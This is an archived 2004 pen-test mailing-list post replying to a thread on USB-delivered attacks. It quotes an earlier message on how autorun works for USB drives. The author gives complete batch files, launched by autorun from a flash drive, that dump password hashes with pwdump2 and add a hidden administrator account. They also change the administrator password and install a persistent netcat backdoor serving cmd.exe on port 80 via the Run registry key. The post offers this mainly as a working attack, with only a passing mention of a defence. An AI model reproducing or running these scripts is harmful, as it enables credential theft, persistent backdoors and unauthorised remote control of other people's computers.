From: mak_pen@hotmail.com
Date: Thu Jun 03 2004 - 11:03:11 EDT
I have been using this "attack" for some time now. below are the batch files (test.bat, b.bat and autorun.inf. autorun.inf calls test.bat)i use:
*********<BOF test.bat>
@echo off
@start /min b.bat /B
@exit
<EOF test.bat>
*********<BOF b.bat>
@explorer .
@echo off
::Displaying Computer Information for my reference
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt
::Adding a user for me :o)
@net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
@net localgroup Administrators _system32_ /add
::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t REG_DWORD /d 0 /f
::Enabling Admin Shares
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 1 /f
::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu
::Backdooring
@copy nc.exe <nc directory>
@cd c:
@cd <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f
@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>
I have tried this using a flash memmory and it works. what happens is that it opens explorer showing the current directory so that it hides any shells that might appear, then it does a series of commands which i have documented above.
to prevent against this i have a registry file i use to disable autorun all together. contact me if you need it at: mak_pen(at)hotmail(dot)com
Cheers....
>Received: (qmail 20035 invoked from network); 2 Jun 2004 22:23:41 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
> by mail.securityfocus.com with SMTP; 2 Jun 2004 22:23:41 -0000
>Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
> by outgoing2.securityfocus.com (Postfix) with QMQP
> id 62E8414370A; Thu, 3 Jun 2004 00:26:35 -0600 (MDT)
>Mailing-List: contact pen-test-help@securityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <pen-test.list-id.securityfocus.com>
>List-Post: <mailto:pen-test@securityfocus.com>
>List-Help: <mailto:pen-test-help@securityfocus.com>
>List-Unsubscribe: <mailto:pen-test-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:pen-test-subscribe@securityfocus.com>
>Delivered-To: mailing list pen-test@securityfocus.com
>Delivered-To: moderator for pen-test@securityfocus.com
>Received: (qmail 27926 invoked from network); 2 Jun 2004 19:49:38 -0000
>X-Originating-IP: [66.130.148.65]
>X-Originating-Email: [mindedsmasher@hotmail.com]
>X-Sender: mindedsmasher@hotmail.com
>From: "Fred Gravel" <mindedsmasher@hotmail.com>
>To: pen-test@securityfocus.com
>Subject: Re: USB delivered attacks
>Date: Wed, 02 Jun 2004 20:02:14 +0000
>Mime-Version: 1.0
>Content-Type: text/plain; format=flowed
>Message-ID: <BAY15-F11d7KKQpQq5p00043ca6@hotmail.com>
>X-OriginalArrivalTime: 02 Jun 2004 20:02:14.0500 (UTC) FILETIME=[7FA8F240:01C448DC]
>
>And after some search ... autorun is possible on a usb storage device... as
>it explained just below ...
>
>http://www.microsoft.com/whdc/device/storage/usbfaq.mspx
>Q: What must I do to trigger Autorun on my USB storage device?
>If you need to make a USB storage device that executes Autorun, the
>following two conditions must both be true:
>?
>
>Media must be marked as removable.
>?
>
>The device can be set to either static or removable.
>
>We associate the "removable" nature of a device with the bus that it resides
>on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI
>bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus
>would be regarded as removable by default. PnP uses a bit in the
>DEVICE_CAPABILITIES structure to determine this. For more information, see
>the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located
>at
>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.
>
>The "removable" nature of media is a property of the device. For example, in
>the case of a CD-ROM or a ZIP drive, the medium can be removed without the
>device itself going away, but on the other hand the medium and the disk
>cannot be separated on static storage PC cards. We obtain this information
>by using the StorageDeviceProperty request. For more information, see the
>STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at
>http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.
>
>
>----
>Also the autorun could be used in "cooperation" of the desktop.ini file
>included in the folder(s) on the usb storage device if needed...
>
>_________________________________________________________________
>MSN Toolbar provides one-click access to Hotmail from any Web page ? FREE
>download! http://toolbar.msn.click-url.com/go/onm00200413ave/direct/01/
>
>
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:55 EDT